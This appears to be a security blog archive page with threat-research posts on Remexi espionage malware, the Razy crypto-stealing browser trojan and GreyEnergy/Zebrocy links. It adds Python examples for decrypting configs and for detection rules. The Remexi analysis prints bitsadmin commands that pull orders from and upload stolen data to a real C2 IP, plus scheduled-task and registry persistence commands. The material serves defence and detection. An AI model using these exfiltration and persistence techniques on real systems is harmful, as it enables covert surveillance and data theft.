The US remains out in front in terms of botnet C&C server hosting, even extending its lead from 37.31% to 43.48%. Slipping to seventh, Russia (4.08%) ceded second place to Britain (7.88%). Bronze went to the Netherlands, whose share increased from 2.24% to 6.79%. Significantly, all this growth is attributable to the rising number of Mirai C&C servers.

Italy and the Czech Republic vacated the Top 10 of botnet-rich countries, while Germany (5.43%) and Romania (3.26%) moved in. China (2.72%) continues to lose ground, clinging on to tenth position in Q4.

Distribution of botnet C&C servers by country, Q4 2018

Conclusion

For the third quarter in a row, the Top 10 ratings of countries by number of attacks, targets, and botnet C&C servers continue to fluctuate. Growth in DDoS activity is strongest where previously it was relatively low, while the once-dominant countries have seen a decline. This could well be the result of successful law enforcement and other initiatives to combat botnets. Another reason could be the emergence of better communications infrastructure in regions where DDoS attacks used to be infeasible.

If the trend continues, next quarter’s Top 10 will likely feature some more new entries, and in the long run, the shares of different countries could start to even out.

January 30, 2019

Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities

Executive Summary

Throughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage campaign that was primarily targeting foreign diplomatic entities based in Iran. The attackers were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation. This malware has previously been associated with an APT actor that Symantec calls Chafer.

The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible. The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe to receive commands and exfiltrate data. Its C2 is based on IIS using .asp technology to handle the victims’ HTTP requests.

Remexi developers use the C programming language and GCC compiler on Windows in the MinGW environment. They most likely used the Qt Creator IDE in a Windows environment. The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive.

XOR and RC4 encryption is used with quite long unique keys for different samples. Among these random keys, the word “salamati”, which means “health” in Farsi, was also used once.

Kaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and Trojan.Win32.Agent. This blogpost is based on our original report shared with our APT Intelligence Reporting customers in November 2018. For more information please contact: intelreports@kaspersky.com

Technical analysis

The main tool used in this campaign is an updated version of the Remexi malware, publicly reported by Symantec back in 2015. The newest module’s compilation timestamp is March 2018. The developers used the GCC compiler on Windows in the MinGW environment.

Inside the binaries the compiler left references to the names of the C source file modules used: “operation_reg.c”, “thread_command.c” and “thread_upload.c”. As the module file names suggest, the malware consists of several working threads dedicated to different tasks, including C2 command parsing and data exfiltration. For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP.

Proliferation

So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread. However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi’s main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware. This dropper used an FTP server with hardcoded credentials to receive its payload. The FTP server was no longer accessible at the time of our analysis.

Malware features

Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands. Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim’s data.

Remexi includes different modules that it deploys in its working directory, including configuration decryption and parsing, launching victim activity logging in a separate module, and seven threads for various espionage and auxiliary functions. The Remexi developers seem to rely on legitimate Microsoft utilities, which we enumerate in the table below.

| Utility | Usage |
|---|---|
| extract.exe | Deploys modules from the .cab file into the working Event Cache directory |
| bitsadmin.exe | Fetches files from the C2 server to parse and execute commands. Sends exfiltrated data |
| taskkill.exe | Ends working cycle of modules |

Persistence

Persistence modules are based on scheduled tasks and system registry. Mechanisms vary for different OS versions. In the case of old Windows versions like XP, main module events.exe runs an edited XPTask.vbs Microsoft sample script to create a weekly scheduled task for itself. For newer operating systems, events.exe creates task.xml as follows:

Then it creates a Windows scheduled task using the following command:

schtasks.exe /create /TN \"Events\\CacheTask_<user_name_here>" /XML \"<event_cache_dir_path>t /F"

At the system registry level, modules achieve persistence by adding themselves into the key:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

when it is able to add values to the Winlogon subkey, and in

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager

All such indicators of compromise are listed in the corresponding appendix below.

Commands

All the commands received from the C2 are first saved to an auxiliary file and then stored encrypted in the system registry. The standalone thread will decrypt and execute them.

| Command | Description |
|---|---|
| search | Searches for corresponding files |
| search&upload | Encrypts and adds the corresponding files to the upload directory with the provided name |
| uploadfile | Encrypts and adds the specified file to the upload directory with the provided name |
| uploadfolder | Encrypts and adds the mentioned directory to the upload directory with the provided name |
| shellexecute | Silently executes received command with cmd.exe |
| wmic | Silently executes received command with wmic.exe (for WMI commands) |
| sendIEPass | Encrypts and adds all gathered browser data into files for upload to C2 |
| uninstall | Removes files, directory and BITS tasks |

Cryptography

To decrypt the configuration data, the malware uses XOR with 25-character keys such as “waEHleblxiQjoxFJQaIMLdHKz” that are different for every sample. RC4 file encryption relies on the Windows 32 CryptoAPI, using the provided value’s MD5 hash as an initial vector. Among these random keys, the word “salamati”, which means “health” in Farsi, was also used once.

Configuration

Config.ini is the file where the malware stores its encrypted configuration data. It contains the following fields:

| Field | Sample value | Description |
|---|---|---|
| diskFullityCheckRatio | 1.4 | Malware working directory size threshold. It will be deleted if it becomes as large as the free available space multiplied by this ratio |
| captureScreenTimeOut | 72 | Probability of full and active window screenshots being taken after mouse click |
| captureActiveWindowTimeOut | 313 | Probability of full and active window screenshots being taken after mouse click |
| captureScreenQC | 40 | Not really used. Probably full and active window screenshot quality |
| captureActiveQC | 40 | Not really used. Probably full and active window screenshot quality |
| CaptureSites | VPN*0,0; Login*0,0; mail*0,0; Security*0,0 | Window titles of interest for screenshots, using left mouse button and Enter keypress hook |
| important | upLog.txt; upSCRLog.txt; upSpecial.txt; upFile.txt; upMSLog.txt | List of files to send to C2 using bitsadmin.exe from the dedicated thread |
| maxUpFileSizeKByte | 1000000 | Maximum size of file uploaded to C2 |
| Servers | http://108.61.189.174 | Control server HTTP URL |
| ZipPass | KtJvOXulgibfiHk | Password for uploaded zip archives |
| browserPasswordCheckTimeout | 300000 | Milliseconds to wait between gathering key3.db, cookies.sqlite and other browser files in dedicated thread |

Most of the parameters are self-explanatory. However, captureScreenTimeOut and captureActiveWindowTimeOut are worth describing in more detail as their programming logic is not so intuitive.

One of the malware threads checks in an infinite loop if the mouse button was pressed and then also increments the integer iterator infinitely. If the mouse hooking function registers a button hit, it lets the screenshotting thread know about it through a global variable. After that, it checks if the iterator divided by (captureScreenTimeOut/captureActiveWindowTimeOut) has a remainder of 0. In that case, it takes a screenshot.
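An analyst holding only an encrypted config.ini does not need the binary to read it: because the XOR key repeats every 25 bytes, a single known field name of at least 25 characters recovers the whole key. The sketch below is an added example, not code from this report or from Remexi; the name=value layout of the decrypted file and the presence of the field names in it are assumptions, and the sample ciphertext is constructed from the sample values in the table above.

```python
from itertools import cycle

KEY_LEN = 25  # key length stated in the report

# Field names from the report's configuration table.
FIELD_NAMES = [
    b"diskFullityCheckRatio", b"captureScreenTimeOut",
    b"captureActiveWindowTimeOut", b"captureScreenQC", b"captureActiveQC",
    b"CaptureSites", b"important", b"maxUpFileSizeKByte", b"Servers",
    b"ZipPass", b"browserPasswordCheckTimeout",
]


def xor(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_key(ciphertext: bytes, crib: bytes, min_fields: int = 3):
    """Slide a known field name (the crib) over the ciphertext.

    Returns (key, plaintext) for the offset whose decryption contains the
    most known field names, or None if no offset reaches min_fields.
    """
    if len(crib) < KEY_LEN:
        raise ValueError("crib must cover a full key period")
    best = None
    for off in range(len(ciphertext) - KEY_LEN + 1):
        # If the crib starts at `off`, ciphertext byte off+i was XORed with
        # key byte (off+i) % KEY_LEN, so 25 bytes pin down the whole key.
        key = bytearray(KEY_LEN)
        for i in range(KEY_LEN):
            key[(off + i) % KEY_LEN] = ciphertext[off + i] ^ crib[i]
        plain = xor(ciphertext, bytes(key))
        score = sum(name in plain for name in FIELD_NAMES)
        if score >= min_fields and (best is None or score > best[0]):
            best = (score, bytes(key), plain)
    return None if best is None else best[1:]


def parse_config(plain: bytes) -> dict:
    """Assumed layout: one name=value pair per line."""
    cfg = {}
    for line in plain.decode("latin-1").splitlines():
        name, sep, value = line.partition("=")
        if sep:
            cfg[name.strip()] = value.strip()
    return cfg


# Constructed sample: names and values come from the report's table, the
# name=value layout is assumed, and the key is the report's example key.
SAMPLE_KEY = b"waEHleblxiQjoxFJQaIMLdHKz"
SAMPLE_PLAIN = (
    b"diskFullityCheckRatio=1.4\r\n"
    b"captureScreenTimeOut=72\r\n"
    b"captureActiveWindowTimeOut=313\r\n"
    b"maxUpFileSizeKByte=1000000\r\n"
    b"Servers=http://108.61.189.174\r\n"
    b"browserPasswordCheckTimeout=300000\r\n"
)
SAMPLE_CIPHERTEXT = xor(SAMPLE_PLAIN, SAMPLE_KEY)


def demo():
    """Recover the key from ciphertext alone, then parse the config."""
    key, plain = recover_key(SAMPLE_CIPHERTEXT, b"captureActiveWindowTimeOut")
    return key, parse_config(plain)


if __name__ == "__main__":
    key, cfg = demo()
    print("key:", key.decode())
    print("C2 :", cfg["Servers"])
```

The Servers value recovered this way is the per-sample C2 address to add to network blocklists and retro-hunts.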

Main module (events.exe)

SHA256: b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31
MD5: c981273c32b581de824e1fd66a19a281
Compiled: GCC compiler in MinGW environment version 2.24, timestamp set to 1970 by compiler
Type: I386 Windows GUI EXE
Size: 68 608

After checking that the malware is not already installed, it unpacks HCK.cab using the Microsoft standard utility expand.exe with the following arguments:

expand.exe -r \"<full path to HCK.cab>\" -f:* \"<event_cache_dir_path>\\\"

Then it decrypts config.ini file with a hardcoded 25-byte XOR key that differs for every sample. It sets keyboard and mouse hooks to its handlekeys() and MouseHookProc() functions respectively and starts several working threads:

| ID | Thread description |
|---|---|
| 1 | Gets commands from C2 and saves them to a file and system registry using the bitsadmin.exe utility |
| 2 | Decrypts command from registry using RC4 with a hardcoded key, and executes it |
| 3 | Transfers screenshots from the clipboard to \Cache005 subdirectory and Unicode text from clipboard to log.txt, XOR-ed with the “salamati” key (“health” in Farsi) |
| 4 | Transfers screenshots to \Cache005 subdirectory with captureScreenTimeOut and captureScreenTimeOut frequencies |
| 5 | Checks network connection, encrypts and sends gathered logs |
| 6 | Unhooks mouse and keyboard, removes bitsadmin task |
| 7 | Checks if malware’s working directory size already exceeds its threshold |
| 8 | Gathers victim’s credentials, visited website cache, decrypted Chrome login data, as well as Firefox databases with cookies, keys, signons and downloads |

The malware uses the following command to receive data from its C2:

bitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal <server> <file> http://<server_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>

Activity logging module (Splitter.exe)

This module is called from the main thread to obtain screenshots of windows whose titles are specified in the configuration CaptureSites field, bitmaps and text from clipboard, etc.

SHA256: a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff
MD5: 1ff40e79d673461cd33bd8b68f8bb5b8
Compiled: 2017.08.06 11:32:36 (GMT), 2.22
Type: I386 Windows Console EXE
Size: 101 888

Instead of implementing this auxiliary module in the form of a dynamic linked library with its corresponding exported functions, the developers decided to use a standalone executable started by events.exe with the following parameters:

| Parameter | Description |
|---|---|
| -scr | Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration. Can capture all screen (“AllScreen”) or the active window (“ActiveWindow”) |
| -ms | Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration. Specifies the screen coordinates to take |
| -zip | Name of password (from configuration data) protected zip archive |
| -clipboard | Screenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory, zipped with password from configuration |

Data exfiltration

Exfiltration is done through the bitsadmin.exe utility. The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS itself. The following is the command used to exfiltrate data from the victim to the C2:

bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal "<control_server>/YP01_<victim_fingerprint>_<log_file_name>" "<log_file_name>"

Victims

The vast majority of the users targeted by this new variant of Remexi appear to have Iranian IP addresses. Some of these appear to be foreign diplomatic entities based in the country.

Attribution

The Remexi malware has been associated with an APT actor called Chafer by Symantec.

One of the human-readable encryption keys used is “salamati”. This is probably the Latin spelling for the word “health” in Farsi. Among the artifacts related to malware authors, we found in the binaries a .pdb path containing the Windows user name “Mohamadreza New”. Interestingly, the FBI website for wanted cybercriminals includes two Iranians called Mohammad Reza, although this could be a common name or even a false flag.

Conclusions

Activity of the Chafer APT group has been observed since at least 2015, but based on things like compilation timestamps and C&C registration, it’s possible they have been active for even longer. Traditionally, Chafer has been focusing on targets inside Iran, although their interests clearly include other countries in the Middle East.

We will continue to monitor how this set of activity develops in the future.

Indicators of compromise

Domains and IPs

108.61.189.174

Hardcoded mutexes

Local\TEMPDAHCE01
Local\zaapr
Local\reezaaprLog
Local\{Temp-00-aa-123-mr-bbb}

Scheduled task

CacheTask_<user_name_here>

Directory with malicious modules

Main malware directory: %APPDATA%\Microsoft\Event Cache
Commands from C2 in subdirectory: Cache001\cde00.acf

Events.exe persistence records in Windows system registry keys

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager

Victims’ fingerprints stored in

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PidRegData or
HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PidRegData

RC4 encrypted C2 commands stored in

HKCU\SOFTWARE\Microsoft\Fax

HTTP requests template

http://<server_ip_from_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>
And bitsadmin.exe task to external network resources, addressed by IP addresses
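
The strings listed above are specific enough to hunt for in process-creation telemetry. The following is an added example, not part of the original report: it matches command lines against the BITS job names, URL templates, task name, .cab name and working directory given in this article, and flags bitsadmin transfers to a public IP address. The event layout (host, cmdline) and the sample events are constructed.

```python
import ipaddress
import re

# Each rule uses only strings this report lists for Remexi.
RULES = {
    "bits_job_download": re.compile(r'/transfer\s+"?HelpCenterDownload\b', re.I),
    "bits_job_upload": re.compile(r'/transfer\s+"?HelpCenterUpload\b', re.I),
    "c2_checkin_url": re.compile(r'/asp\.asp\?ui=\S*nrg-', re.I),
    "exfil_name_prefix": re.compile(r'https?://[^/\s"]+/YP01_', re.I),
    "task_name": re.compile(r'\bEvents\\+CacheTask_', re.I),
    "cab_unpack": re.compile(r'\bexpand(?:\.exe)?\b.*\bHCK\.cab\b', re.I),
    "working_dir": re.compile(r'\\Microsoft\\Event Cache\b', re.I),
}
# bitsadmin talking to a URL whose host is a literal IPv4 address.
BITS_IP_URL = re.compile(
    r'\bbitsadmin(?:\.exe)?\b.*?https?://(\d{1,3}(?:\.\d{1,3}){3})(?=[:/"\s]|$)',
    re.I,
)


def external_bits_ip(cmdline):
    """Return the IP if bitsadmin targets a public (non-internal) address."""
    m = BITS_IP_URL.search(cmdline)
    if not m:
        return None
    try:
        ip = ipaddress.ip_address(m.group(1))
    except ValueError:  # not a valid address, e.g. 999.1.1.1
        return None
    return str(ip) if ip.is_global else None


def scan(events):
    """Return (host, sorted rule names) for every event with at least one hit."""
    findings = []
    for ev in events:
        hits = [name for name, rx in RULES.items() if rx.search(ev["cmdline"])]
        if external_bits_ip(ev["cmdline"]):
            hits.append("bits_to_external_ip")
        if hits:
            findings.append((ev["host"], sorted(hits)))
    return findings


# Constructed events; the IP is the sample Servers value from the report.
SAMPLE_EVENTS = [
    {"host": "WS-01", "cmdline":
        r'expand.exe -r "C:\Users\alice\AppData\Roaming\Microsoft\Event Cache\HCK.cab"'
        r' -f:* "C:\Users\alice\AppData\Roaming\Microsoft\Event Cache"'},
    {"host": "WS-01", "cmdline":
        r'schtasks.exe /create /TN "Events\CacheTask_alice" /XML'
        r' "C:\Users\alice\AppData\Roaming\Microsoft\Event Cache\task.xml" /F'},
    {"host": "WS-01", "cmdline":
        r'bitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal'
        r' http://108.61.189.174/asp.asp?ui=WS-01nrg-0A1B2C3D4E5F-alice'
        r' "C:\Users\alice\AppData\Roaming\Microsoft\Event Cache\Cache001\cde00.acf"'},
    {"host": "WS-01", "cmdline":
        r'bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal'
        r' "http://108.61.189.174/YP01_WS-01_upLog.txt" "upLog.txt"'},
    # Benign look-alikes: internal BITS transfer and an unrelated expand call.
    {"host": "SRV-02", "cmdline":
        r'bitsadmin.exe /transfer PatchJob /download /priority normal'
        r' http://10.0.0.5/patch.cab C:\Temp\patch.cab'},
    {"host": "SRV-02", "cmdline":
        r'expand.exe C:\Temp\drivers.cab -F:* C:\Temp\drivers'},
]

if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS):
        print(host, ", ".join(hits))
```

The job names and the YP01_ prefix are high-confidence matches; bits_to_external_ip on its own also fires for legitimate tooling that downloads by IP address, so it is best treated as a supporting signal.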

January 24, 2019

Razy in search of cryptocurrency

Last year, we discovered malware that installs a malicious browser extension on its victim’s computer or infects an already installed extension. To do so, it disables the integrity check for installed extensions and automatic updates for the targeted browser. Kaspersky Lab products detect the malicious program as Trojan.Win32.Razy.gen – an executable file that spreads via advertising blocks on websites and is distributed from free file-hosting services under the guise of legitimate software.

Razy serves several purposes, mostly related to the theft of cryptocurrency. Its main tool is the script main.js that is capable of:

  • Searching for addresses of cryptocurrency wallets on websites and replacing them with the threat actor’s wallet addresses
  • Spoofing images of QR codes pointing to wallets
  • Modifying the web pages of cryptocurrency exchanges
  • Spoofing Google and Yandex search results

Infection

The Trojan Razy ‘works’ with Google Chrome, Mozilla Firefox and Yandex Browser, though it has different infection scenarios for each browser type.

Mozilla Firefox

For Firefox, the Trojan installs an extension called ‘Firefox Protection’ with the ID {ab10d63e-3096-4492-ab0e-5edcf4baf988} (folder path: “%APPDATA%\Mozilla\Firefox\Profiles\.default\Extensions\{ab10d63e-3096-4492-ab0e-5edcf4baf988}”).

For the malicious extension to start working, Razy edits the following files:

  • “%APPDATA%\Mozilla\Firefox\Profiles\.default\prefs.js”,
  • “%APPDATA%\Mozilla\Firefox\Profiles\.default\extensions.json”,
  • “%PROGRAMFILES%\Mozilla Firefox\omni.js”.

Yandex Browser

The Trojan edits the file ‘%APPDATA%\Yandex\YandexBrowser\Application\\browser.dll’ to disable extension integrity check. It renames the original file ‘browser.dll_’ and leaves it in the same folder.

To disable browser updates, it creates the registry key ‘HKEY_LOCAL_MACHINE\SOFTWARE\Policies\YandexBrowser\UpdateAllowed’ = 0 (REG_DWORD).

Then the extension Yandex Protect is installed to folder ‘%APPDATA%\Yandex\YandexBrowser\User Data\Default\Extensions\acgimceffoceigocablmjdpebeodphgc\6.1.6_0’. The ID acgimceffoceigocablmjdpebeodphgc corresponds to a legitimate extension for Chrome called Cloudy Calculator, version 6.1.6_0. If this extension has already been installed on the user’s device in Yandex Browser, it is replaced with the malicious Yandex Protect.

Google Chrome

Razy edits the file ‘%PROGRAMFILES%\Google\Chrome\Application\\chrome.dll’ to disable the extension integrity check. It renames the original chrome.dll file chrome.dll_ and leaves it in the same folder.

It creates the following registry keys to disable browser updates:

  • “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Update\AutoUpdateCheckPeriodMinutes” = 0 (REG_DWORD)
  • “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Update\DisableAutoUpdateChecksCheckboxValue” = 1 (REG_DWORD)
  • “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Update\InstallDefault” = 0 (REG_DWORD)
  • “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Update\UpdateDefault” = 0 (REG_DWORD)

We have encountered cases where different Chrome extensions were infected. One extension in particular is worth mentioning: Chrome Media Router is a component of the service with the same name in browsers based on Chromium. It is present on all devices where the Chrome browser is installed, although it is not shown in the list of installed extensions. During the infection, Razy modified the contents of the folder where the Chrome Media Router extension was located: ‘%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm’.

Scripts used

Irrespective of the targeted browser type, Razy added the following scripts it brought along to the folder containing the malicious script: bgs.js, extab.js, firebase-app.js, firebase-messaging.js and firebase-messaging-sw.js. The file manifest.json was created in the same folder or was overwritten to ensure these scripts get called.

Left: list of files of the original Chrome Media Router extension.
Right: list of files of the modified Chrome Media Router extension.

The scripts firebase-app.js, firebase-messaging.js and firebase-messaging-sw.js are legitimate. They belong to the Firebase platform and are used to send statistics to the malicious actor’s Firebase account.

The scripts bgs.js and extab.js are malicious and are obfuscated with the help of the tool obfuscator.io. The former sends statistics to the Firebase account; the latter (extab.js) inserts a call to the script i.js with parameters tag=&did=&v_tag=&k_tag= into each page visited by the user.

In the above example, the script i.js is distributed from the web resource gigafilesnote[.]com (gigafilesnote[.]com/i.js?tag=&did=&v_tag=&k_tag=). In other cases, similar scripts were detected in the domains apiscr[.]com, happybizpromo[.]com and archivepoisk-zone[.]info.

The script i.js modifies the HTML page, inserts advertising banners and video clips, and adds adverts into Google search results.

YouTube page with banners added by the script i.js

The culmination of the infection is main.js – a call to the script is added to each page visited by the user.

Fragment of the script i.js code that inserts the script main.js to web pages.

The script main.js is distributed from the addresses:

  • Nolkbacteria[.]info/js/main.js?_=
  • 2searea0[.]info/js/main.js?_=
  • touristsila1[.]info/js/main.js?_=
  • solkoptions[.]host/js/main.js?_=

The script main.js is not obfuscated and its capabilities can be seen from the function names.

The screenshot above shows the function findAndReplaceWalletAddresses that searches for Bitcoin and Ethereum wallets and replaces them with the addresses of the threat actor’s wallets. Notably, this function works on almost all pages except those located on Google and Yandex domains, as well as on popular domains like instagram.com and ok.ru.

Images of QR codes that point to wallets also get substituted. The substitution occurs when the user visits the web resources gdax.com, pro.coinbase.com, exmo.*, binance.* or when an element with src=’/res/exchangebox/qrcode/’ is detected on the webpage.

As well as the functionality described above, main.js modifies the webpages of the cryptocurrency exchanges EXMO and YoBit. The following script calls are added to the pages’ codes:

  • /js/exmo-futures.js?_= – when exmo.*/ru/* pages are visited
  • /js/yobit-futures.js?_= – when yobit.*/ru/* pages are visited

where is one of the domains nolkbacteria[.]info, 2searea0[.]info, touristsila1[.]info, or archivepoisk-zone[.]info.

These scripts display fake messages to the user about “new features” in the corresponding exchanges and offers to sell cryptocurrency at above market rates. In other words, users are persuaded to transfer their money to the cybercriminal’s wallet under the pretext of a good deal.

Example of a scam message on the EXMO website

Main.js also spoofs Google and Yandex search results. Fake search results are added to pages if the search request is connected with cryptocurrencies and cryptocurrency exchanges, or just music downloading or torrents:
  • /(?:^|\s)(gram|телеграм|токен|ton|ico|telegram|btc|биткойн|bitcoin|coinbase|крипта|криптовалюта|,bnrjqy|биржа|бираж)(?:\s|$)/g;
  • /(скачать.*музык|музык.*скачать)/g;
  • /тор?рент/g;

This is how an infected user is enticed to visit infected websites or legitimate cryptocurrency-themed sites where they will see the message described above.

Google search results that were modified by the infected extension

When the user visits Wikipedia, main.js adds a banner containing a request for donations to support the online encyclopedia. The cybercriminals’ wallet addresses are used in place of bank details. The original Wikipedia banner asking for donations (if present) is deleted.

Fake banner on Wikipedia asking for donations

When the user visits the webpage telegram.org, they will see an offer to buy Telegram tokens at an incredibly low price.

The infected extension loads content on the telegram.org site from the phishing web resource ton-ico[.]network

Fake banner shown at telegram.org. The link leads to the phishing website ton-ico[.]network

When users visit the pages of Russian social network Vkontakte (VK), the Trojan adds an advertising banner to it. If a user clicks on the banner, they are redirected to phishing resources (located on the domain ooo-ooo[.]info), where they are prompted to pay a small sum of money now to make a load of money later on.

Fraudulent banner on the vk.com website

Indicators of compromise

Kaspersky Lab’s products detect scripts associated with Razy as HEUR:Trojan.Script.Generic.

Below are all the wallet addresses detected in the analyzed scripts:

  • Bitcoin: ‘1BcJZis6Hu2a7mkcrKxRYxXmz6fMpsAN3L’, ‘1CZVki6tqgu2t4ACk84voVpnGpQZMAVzWq’, ‘3KgyGrCiMRpXTihZWY1yZiXnL46KUBzMEY’, ‘1DgjRqs9SwhyuKe8KSMkE1Jjrs59VZhNyj’, ‘35muZpFLAQcxjDFDsMrSVPc8WbTxw3TTMC’, ‘34pzTteax2EGvrjw3wNMxaPi6misyaWLeJ’.
  • Ethereum: ‘33a7305aE6B77f3810364e89821E9B22e6a22d43’, ‘2571B96E2d75b7EC617Fdd83b9e85370E833b3b1’, ‘78f7cb5D4750557656f5220A86Bc4FD2C85Ed9a3’.

At the time of writing, total incoming transactions on all these wallets amounted to approximately 0.14 BTC plus 25 ETH.

Phishing domains

ton-ico[.]network,
ooo-ooo[.]info.
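
A host triage check for the changes described under Infection and Scripts used, as an added example that is not from the original article: it reads reg query output and a file listing and reports the update-disabling policy values, the renamed browser DLLs, the Razy scripts inside extension folders and the Firefox Protection extension ID. Both input samples are constructed, and reading UpdateAllowed as a value under the YandexBrowser policy key is an assumption.

```python
import re

HKLM = "HKEY_LOCAL_MACHINE"
# (key, value name) -> data the article says Razy sets to stop browser updates.
# Assumption: UpdateAllowed is a value under the YandexBrowser policy key.
RAZY_POLICIES = {
    (HKLM + r"\SOFTWARE\Policies\Google\Update", "AutoUpdateCheckPeriodMinutes"): 0,
    (HKLM + r"\SOFTWARE\Policies\Google\Update", "DisableAutoUpdateChecksCheckboxValue"): 1,
    (HKLM + r"\SOFTWARE\Policies\Google\Update", "InstallDefault"): 0,
    (HKLM + r"\SOFTWARE\Policies\Google\Update", "UpdateDefault"): 0,
    (HKLM + r"\SOFTWARE\Policies\YandexBrowser", "UpdateAllowed"): 0,
}
RENAMED_DLLS = {"chrome.dll_", "browser.dll_"}   # originals left beside the patched DLL
ADDED_SCRIPTS = {"bgs.js", "extab.js"}           # malicious scripts added to the extension
FIREFOX_EXT_ID = "{ab10d63e-3096-4492-ab0e-5edcf4baf988}"

# reg query prints value lines as: 4 spaces, name, 4 spaces, type, 4 spaces, data
VALUE_LINE = re.compile(r"^\s+(.+?)\s{4}(REG_\w+)\s{4}(.*)$")


def parse_reg_query(text):
    """Parse `reg query <key>` output into {(key, value name): data}, lower-cased."""
    values, key = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():      # unindented line = registry key path
            key = line.strip()
            continue
        m = VALUE_LINE.match(line)
        if m and key:
            name, rtype, data = m.groups()
            if rtype == "REG_DWORD":
                data = int(data, 16)   # reg prints DWORDs as 0x...
            values[(key.lower(), name.lower())] = data
    return values


def policy_hits(reg_text):
    """Names of policy values that are present with the data Razy writes."""
    seen = parse_reg_query(reg_text)
    return sorted(name for (key, name), want in RAZY_POLICIES.items()
                  if seen.get((key.lower(), name.lower())) == want)


def file_hits(paths):
    """Classify file paths against the on-disk changes the article describes."""
    hits = []
    for path in paths:
        parts = path.lower().split("\\")
        name = parts[-1]
        if name in RENAMED_DLLS:
            hits.append(("renamed_original_dll", path))
        if "extensions" in parts[:-1] and name in ADDED_SCRIPTS:
            hits.append(("razy_script_in_extension", path))
        if FIREFOX_EXT_ID in parts:
            hits.append(("firefox_protection_extension", path))
    return hits


# Constructed inputs (user name, version and profile folder are made up).
REG_SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Update
    AutoUpdateCheckPeriodMinutes    REG_DWORD    0x0
    DisableAutoUpdateChecksCheckboxValue    REG_DWORD    0x1
    UpdateDefault    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\YandexBrowser
    UpdateAllowed    REG_DWORD    0x0
"""
EXT_DIR = (r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default"
           r"\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\1.0_0")
PATHS_SAMPLE = [
    r"C:\Program Files\Google\Chrome\Application\1.2.3.4\chrome.dll",
    r"C:\Program Files\Google\Chrome\Application\1.2.3.4\chrome.dll_",
    EXT_DIR + r"\manifest.json",
    EXT_DIR + r"\extab.js",
    r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\abcd1234.default"
    r"\extensions\{ab10d63e-3096-4492-ab0e-5edcf4baf988}\manifest.json",
]

if __name__ == "__main__":
    print(policy_hits(REG_SAMPLE))
    for kind, path in file_hits(PATHS_SAMPLE):
        print(kind, path)
```

Managed fleets sometimes set the same update policies deliberately, so a policy hit is a lead to correlate with the file findings rather than a verdict by itself.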

January 24, 2019

GreyEnergy’s overlap with Zebrocy

In October 2018, ESET published a report describing a set of activity they called GreyEnergy, which is believed to be a successor to the BlackEnergy group. BlackEnergy (a.k.a. Sandworm) is best known, among other things, for having been involved in attacks against Ukrainian energy facilities in 2015, which led to power outages. Like its predecessor, GreyEnergy malware has been detected attacking industrial and ICS targets, mainly in Ukraine.

Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and a Sofacy subset called “Zebrocy”. The Zebrocy activity was named after malware that the Sofacy group has used since mid-November 2015 for the post-exploitation stage of attacks on its victims. Zebrocy’s targets are widely spread across the Middle East, Europe and Asia and the targets’ profiles are mostly government-related.

Both sets of activity used the same servers at the same time and targeted the same organization.

Details

Servers

In our private APT Intel report from July 2018 “Zebrocy implements new VBA anti-sandboxing tricks”, details were provided about different Zebrocy C2 servers, including 193.23.181[.]151.

In the course of our research, the following Zebrocy samples were found to use the same server to download additional components (MD5):

7f20f7fbce9deee893dbce1a1b62827d
170d2721b91482e5cabf3d2fec091151
eae0b8997c82ebd93e999d4ce14dedf5
